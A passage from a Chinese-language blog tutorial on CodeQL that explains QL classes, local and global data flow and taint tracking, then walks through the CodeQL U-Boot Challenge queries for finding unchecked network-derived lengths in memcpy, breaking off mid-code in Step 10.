<span class="number">10</span>] &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> DivisibleInt extends SmallInt &#123;</span><br><span class="line">  SmallInt divisor;   <span class="comment">// declaration of the field `divisor`</span></span><br><span class="line">  <span class="built_in">DivisibleInt</span>() &#123; <span class="keyword">this</span> % divisor = <span class="number">0</span> &#125;</span><br><span class="line"></span><br><span class="line">  SmallInt <span class="built_in">getADivisor</span>() &#123; result = divisor &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from DivisibleInt i</span><br><span class="line">select i, i.<span class="built_in">getADivisor</span>()</span><br></pre></td></tr></table></figure></li><li><p>需要注意的是，</p><ul><li><p>每个类都不能继承自己</p></li><li><p>不能继承final类</p></li><li><p>不能继承不相容的类</p><blockquote><p>这一点需要额外说明一下，从某个基类派生出的类，将拥有基类的所有数据集合范围。如果某个类继承了多个基类，那么<strong>该类内含的数据集合，将是两个基类数据集合的交集</strong>。</p></blockquote></li></ul></li></ul><blockquote><p>参考：<a href="https://help.semmle.com/QL/ql-handbook/types.html#classes">class - QL language reference</a></p></blockquote><h2 id="六、数据流分析与污点追踪">六、数据流分析与污点追踪</h2><blockquote><p>该部分内容主要 <s>参考</s> 翻译自：<a href="https://codeql.github.com/docs/codeql-language-guides/analyzing-data-flow-in-cpp/">Analyzing data flow in C and C++ - CodeQL documentation</a></p><p>参考了<a href="https://codeql.github.com/docs/writing-codeql-queries/about-data-flow-analysis/#about-data-flow-analysis">About data flow analysis</a>的部分内容</p></blockquote><ul><li>我们可以在CodeQL中，使用数据流分析来跟踪可能导致漏洞的潜在恶意数据流。</li><li>数据流分析可以分析出变量在程序中各节点上可能的值，并确定这些值如何在程序中传输以及使用方式。</li><li><strong>数据流</strong>分为两个部分：<strong>局部数据流</strong>以及<strong>全局数据流</strong></li></ul><h3 id="1-局部数据流">1. 局部数据流</h3><p><strong>局部数据流</strong>指的是在一个单独函数内的数据流。局部数据流比全局数据流分析的更加简单、迅速，同时也更加精确。</p><h4 id="a-使用局部数据流">a. 
Using local data flow</h4><ul><li><p>The local data flow library lives in the <code>DataFlow</code> module. The module defines the class <code>Node</code>, which represents any element that data can flow through.</p></li><li><p><code>Node</code>s come in two kinds: expression nodes (<code>ExprNode</code>) and parameter nodes (<code>ParameterNode</code>). The member predicates <code>asExpr</code> and <code>asParameter</code> map a data flow node to the corresponding expression or parameter.</p><blockquote><p>Note: a <code>ParameterNode</code> is the data flow node for a <strong>parameter of the current function</strong>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Node</span> &#123;</span><br><span class="line">  <span class="comment">/** Gets the expression corresponding to this node, if any. */</span></span><br><span class="line">  <span class="function">Expr <span class="title">asExpr</span><span class="params">()</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/** Gets the parameter corresponding to this node, if any. */</span></span><br><span class="line">  <span class="function">Parameter <span class="title">asParameter</span><span class="params">()</span> </span>&#123; ... 
&#125;</span><br><span class="line"></span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>或者使用谓词<code>exprNode</code>以及<code>parameterNode</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Gets the node corresponding to expression `e`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">ExprNode <span class="title">exprNode</span><span class="params">(Expr e)</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Gets the node corresponding to the value of parameter `p` at function entry.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">ParameterNode <span class="title">parameterNode</span><span class="params">(Parameter p)</span> </span>&#123; ... 
&#125;</span><br></pre></td></tr></table></figure></li><li><p>The predicate <code>localFlowStep(Node nodeFrom, Node nodeTo)</code> holds if there is an immediate data flow edge from <code>nodeFrom</code> to <code>nodeTo</code>. It can be applied recursively with the <code>+</code> and <code>*</code> operators, or through the predefined recursive predicate <code>localFlow</code>.</p><p>The following expression finds flow from a parameter <code>source</code> to an expression <code>sink</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">parameterNode</span>(source), DataFlow::<span class="built_in">exprNode</span>(sink))</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-使用局部污点追踪">b. Using local taint tracking</h4><ul><li><p>Local taint tracking extends local data flow with flow steps that do not preserve the value. Consider the following C++ code:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> i = <span class="built_in">tainted_user_input</span>();</span><br><span class="line">some_big_struct *array = <span class="built_in">malloc</span>(i * <span class="built_in">sizeof</span>(some_big_struct));</span><br></pre></td></tr></table></figure><p>Because the input variable <code>i</code> is tainted, the argument passed to <code>malloc</code>, which is computed from <code>i</code>, is tainted as well.</p></li><li><p>The local taint tracking library lives in the <code>TaintTracking</code> module. As with local data flow, there is a predicate <code>localTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo)</code> for a single taint step, and a recursive version, the <code>localTaint</code> predicate.</p><p>A simple example that finds taint propagation from a parameter <code>source</code> to an expression <code>sink</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TaintTracking::<span class="built_in">localTaint</span>(DataFlow::<span class="built_in">parameterNode</span>(source), DataFlow::<span class="built_in">exprNode</span>(sink))</span><br></pre></td></tr></table></figure></li></ul><h4 id="c-例子">c. 
例子</h4><ul><li><p>这个例子是用于查找传入<code>fopen</code>函数的文件名称</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">select fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)</span><br></pre></td></tr></table></figure><p>但上面的ql代码只会将<strong>文件名参数</strong>的表达式输出，而这并不是可能传递给它的值。因此我们需要使用局部数据流分析来找到所有可流入该参数的表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc, Expr src</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">  <span class="keyword">and</span> DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">exprNode</span>(src), DataFlow::<span class="built_in">exprNode</span>(fc.<span 
class="built_in">getArgument</span>(<span class="number">0</span>)))</span><br><span class="line">select src</span><br></pre></td></tr></table></figure><p>这样它将会输出可能流入<code>fopen</code>文件名参数的<strong>所有变量的表达式</strong>。</p><p>现在我们可以稍微将<code>source</code>改一下，将<code>exprNode</code>改成<code>parameterNode</code>，这样就可以查询出<strong>既是当前函数的参数，又可以作为<code>fopen</code>的文件名参数</strong>的表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc, Parameter p</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">  <span class="keyword">and</span> DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">parameterNode</span>(p), DataFlow::<span class="built_in">exprNode</span>(fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)))</span><br><span class="line">select p</span><br></pre></td></tr></table></figure></li><li><p>以下这个例子将会查找<strong>格式字符串中没有被硬编码</strong>的格式化函数的调用。</p><blockquote><p>格式化函数包括但不限于各种<code>printf</code>函数。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.commons.Printf</span><br><span class="line"></span><br><span class="line">from FormattingFunction format, FunctionCall call, Expr formatString</span><br><span class="line">where call.<span class="built_in">getTarget</span>() = format</span><br><span class="line">  <span class="keyword">and</span> call.<span class="built_in">getArgument</span>(format.<span class="built_in">getFormatParameterIndex</span>()) = formatString</span><br><span class="line">  <span class="keyword">and</span> <span class="keyword">not</span> <span class="built_in">exists</span>(DataFlow::Node source, DataFlow::Node sink |</span><br><span class="line">    DataFlow::<span class="built_in">localFlow</span>(source, sink) <span class="keyword">and</span></span><br><span class="line">    source.<span class="built_in">asExpr</span>() instanceof StringLiteral <span class="keyword">and</span></span><br><span class="line">    sink.<span class="built_in">asExpr</span>() = formatString</span><br><span class="line">  )</span><br><span class="line">select call, <span class="string">&quot;Argument to &quot;</span> + format.<span class="built_in">getQualifiedName</span>() + <span class="string">&quot; isn&#x27;t hard-coded.&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="2-全局数据流">2. Global data flow</h3><p>Global data flow tracks data flow through the entire program and is therefore more powerful than local data flow. However, it is less precise than local data flow, and the analysis typically needs more time and memory.</p><h4 id="a-使用全局数据流">a. 
使用全局数据流</h4><p>通过继承<code>DataFlow::Configuration</code>类来使用全局数据流库。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">MyDataFlowConfiguration</span> extends DataFlow::Configuration &#123;</span><br><span class="line">  <span class="built_in">MyDataFlowConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;MyDataFlowConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在<code>DataFlow::Configuration</code>类中定义了如下几个谓词：</p><ul><li><code>isSource</code>： <strong>定义数据可能从何处流出</strong></li><li><code>isSink</code>： <strong>定义数据可能流向的位置</strong></li><li><code>isBarrier</code>： 可选，限制数据流</li><li><code>isBarrierGuard</code>： 可选，限制数据流</li><li><code>isAdditionalFlowStep</code>： 可选，添加其他流程步骤</li></ul><p>在特征谓词<code>MyDataFlowConfiguration()</code>中定义了当前<code>Configuration</code>的名称，因此内部的<code>&quot;MyDataFlowConfiguration&quot;</code>需要替换成自己的名称。</p><p>使用谓词<code>hasFlow(DataFlow::Node source, DataFlow::Node 
sink)</code>来执行全局数据流分析</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">from MyDataFlowConfiguration dataflow, DataFlow::Node source, DataFlow::Node sink</span><br><span class="line">where dataflow.<span class="built_in">hasFlow</span>(source, sink)</span><br><span class="line">select source, <span class="string">&quot;Data flow to $@.&quot;</span>, sink, sink.<span class="built_in">toString</span>()</span><br></pre></td></tr></table></figure><h4 id="b-使用全局污点追踪">b. 使用全局污点追踪</h4><p>与局部污点追踪类似，全局污点追踪针对的是全局数据流。全局污点追踪通过其他不保留值的步骤来扩展了全局数据流。</p><p>通过继承<code>TaintTracking::Configuration</code>类以使用全局污点追踪的库函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MyTaintTrackingConfiguration</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">  <span class="built_in">MyTaintTrackingConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;MyTaintTrackingConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    
...</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在配置中定义了以下谓词：</p><ul><li><code>isSource</code>：定义污点可能从何处流出</li><li><code>isSink</code>：定义污点可能流入的地方</li><li><code>isSanitizer</code>：可选，限制污点流</li><li><code>isSanitizerGuard</code>：可选，限制污点流</li><li><code>isAdditionalTaintStep</code>：可选，添加其他污染步骤</li></ul><p>使用谓词<code>hasFlow(DataFlow::Node source, DataFlow::Node sink)</code>以执行污点追踪分析。</p><h4 id="c-例子-2">c. 例子</h4><ul><li><p>以下数据流分析用于追踪<strong>从环境变量到打开文件</strong>的数据流</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">EnvironmentToFileConfiguration</span> extends DataFlow::Configuration &#123;</span><br><span class="line">  <span 
class="built_in">EnvironmentToFileConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;EnvironmentToFileConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    <span class="built_in">exists</span> (Function getenv |</span><br><span class="line">      source.<span class="built_in">asExpr</span>().(FunctionCall).<span class="built_in">getTarget</span>() = getenv <span class="keyword">and</span></span><br><span class="line">      getenv.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;getenv&quot;</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    <span class="built_in">exists</span> (FunctionCall fc |</span><br><span class="line">      sink.<span class="built_in">asExpr</span>() = fc.<span class="built_in">getArgument</span>(<span class="number">0</span>) <span class="keyword">and</span></span><br><span class="line">      fc.<span class="built_in">getTarget</span>().<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from Expr getenv, Expr fopen, EnvironmentToFileConfiguration config</span><br><span class="line">where config.<span class="built_in">hasFlow</span>(DataFlow::<span class="built_in">exprNode</span>(getenv), DataFlow::<span class="built_in">exprNode</span>(fopen))</span><br><span class="line">select fopen, <span class="string">&quot;This &#x27;fopen&#x27; uses data 
from $@.&quot;</span>,</span><br><span class="line">  getenv, <span class="string">&quot;call to &#x27;getenv&#x27;&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>以下污点追踪代码用于追踪从调用<code>ntohl</code>到操作数组索引的数据流。该代码使用<code>Guards</code>库以识别经过边界检查的表达式，同时还定义了谓词<code>isSanitizer</code>以避免污点分析经过特定数据，最后定义了<code>isAdditionalTaintStep</code>用于将流从边界循环添加至循环索引。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.controlflow.Guards</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title 
class_">NetworkToBufferSizeConfiguration</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">  <span class="built_in">NetworkToBufferSizeConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;NetworkToBufferSizeConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node node) &#123;</span><br><span class="line">    node.<span class="built_in">asExpr</span>().(FunctionCall).<span class="built_in">getTarget</span>().<span class="built_in">hasGlobalName</span>(<span class="string">&quot;ntohl&quot;</span>)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node node) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(ArrayExpr ae | node.<span class="built_in">asExpr</span>() = ae.<span class="built_in">getArrayOffset</span>())</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isAdditionalTaintStep</span>(DataFlow::Node pred, DataFlow::Node succ) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(Loop loop, LoopCounter lc |</span><br><span class="line">      loop = lc.<span class="built_in">getALoop</span>() <span class="keyword">and</span></span><br><span class="line">      loop.<span class="built_in">getControllingExpr</span>().(RelationalOperation).<span class="built_in">getGreaterOperand</span>() = pred.<span class="built_in">asExpr</span>() |</span><br><span class="line">      succ.<span class="built_in">asExpr</span>() = lc.<span class="built_in">getVariableAccessInLoop</span>(loop)</span><br><span class="line">    )</span><br><span class="line">  
&#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSanitizer</span>(DataFlow::Node node) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(GuardCondition gc, Variable v |</span><br><span class="line">      gc.getAChild*() = v.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">      node.<span class="built_in">asExpr</span>() = v.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">      gc.<span class="built_in">controls</span>(node.<span class="built_in">asExpr</span>().<span class="built_in">getBasicBlock</span>(), _)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from DataFlow::Node ntohl, DataFlow::Node offset, NetworkToBufferSizeConfiguration conf</span><br><span class="line">where conf.<span class="built_in">hasFlow</span>(ntohl, offset)</span><br><span class="line">select offset, <span class="string">&quot;This array offset may be influenced by $@.&quot;</span>, ntohl,</span><br><span class="line">  <span class="string">&quot;converted data from the network&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="七、CodeQL-U-Boot-Challenge">七、CodeQL U-Boot Challenge</h2><ul><li><p>纸上得来终觉浅，绝知此事要躬行。简单翻阅QL文档是学不到什么的，我们需要自己动手实践一下。</p><p>下面笔者将讲述github learning lab中，用于学习CodeQL的一个入门课程 - <a href="https://lab.github.com/GitHubtraining/codeql-u-boot-challenge-(cc++)">CodeQL U-Boot Challenge (C/C++)</a></p></li><li><p>Step1: 了解从何处获取帮助</p><ul><li><a href="https://lgtm.com/help/lgtm/console/ql-cpp-basic-example">Writing a basic C++ Code QL query</a></li><li><a href="https://help.semmle.com/QL/learn-ql/introduction-to-ql.html">Introduction to CodeQL</a></li><li><a href="https://help.semmle.com/QL/learn-ql/">Learning 
CodeQL</a></li></ul></li><li><p>Step2: 设置IDE</p><ul><li>下载VSCode以及CodeQL插件，还有CodeQL CLI文件。</li><li>下载<a href="https://github.com/github/vscode-codeql-starter/">CodeQL starter</a>工作区</li><li>下载<a href="https://downloads.lgtm.com/snapshots/cpp/uboot/u-boot_u-boot_cpp-srcVersion_d0d07ba86afc8074d79e436b1ba4478fa0f0c1b5-dist_odasa-2019-07-25-linux64.zip">U-Boot CodeQL database</a>并解压</li><li>克隆<a href="https://github.com/Kiprey/codeql-uboot">当前github课程仓库</a></li><li>将当前课程仓库的文件夹添加至之前下载的VScode starter工作区，同时将之前下载的U-Boot数据库导入至VScode</li><li>一切就绪!</li></ul></li><li><p>Step3: 编写一个简单的查询。在这里我们用于查询<code>strlen</code>函数的定义位置。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;strlen&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named strlen&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step4: 分析这个简单的查询，之后查询一下<code>memcpy</code>函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named 
memcpy&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step5: Use different classes and different predicates. Here we write a QL query that finds the macro definitions named <code>ntohs</code>, <code>ntohl</code> and <code>ntohll</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Macro macro</span><br><span class="line"><span class="comment">//where macro.getName() = &quot;ntohs&quot; or macro.getName() = &quot;ntohl&quot; or macro.getName() = &quot;ntohll&quot;</span></span><br><span class="line">where macro.<span class="built_in">getName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select macro</span><br></pre></td></tr></table></figure></li><li><p>Step6: Use two variables. Several variables together can describe a relationship between code elements; here we find the call sites of a specific function.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall c, Function f</span><br><span class="line">where c.<span class="built_in">getTarget</span>() = f <span class="keyword">and</span> f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select c</span><br></pre></td></tr></table></figure></li><li><p>Step7: Apply the technique from Step6 to find where the macros are invoked.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from MacroInvocation invoc</span><br><span class="line">where invoc.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select invoc</span><br></pre></td></tr></table></figure></li><li><p>Step8: 改变select的输出。查找这些宏调用所扩展到的顶级表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from MacroInvocation mi</span><br><span class="line">where mi.<span class="built_in">getMacro</span>().<span class="built_in">getName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select mi.<span class="built_in">getExpr</span>() <span class="comment">// 注意这里的.getExpr()</span></span><br></pre></td></tr></table></figure></li><li><p>Step9：编写一个类。用<code>exists</code>关键字来引入一个临时变量，以设置当前类的数据集合；特征谓词在声明时会被调用以确定当前类的范围，类似于C++构造函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from NetworkByteSwap n</span><br><span class="line">select n, <span class="string">&quot;Network byte swap&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step10：数据流分析。若<code>memcpy</code>中<code>length</code>直接来自于远程，而不加以验证，那么这将会产生OOB漏洞。以下编写的CodeQL查询针对的就是这类情况，它将使用全局数据流分析技术，查出真正的CVE漏洞。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
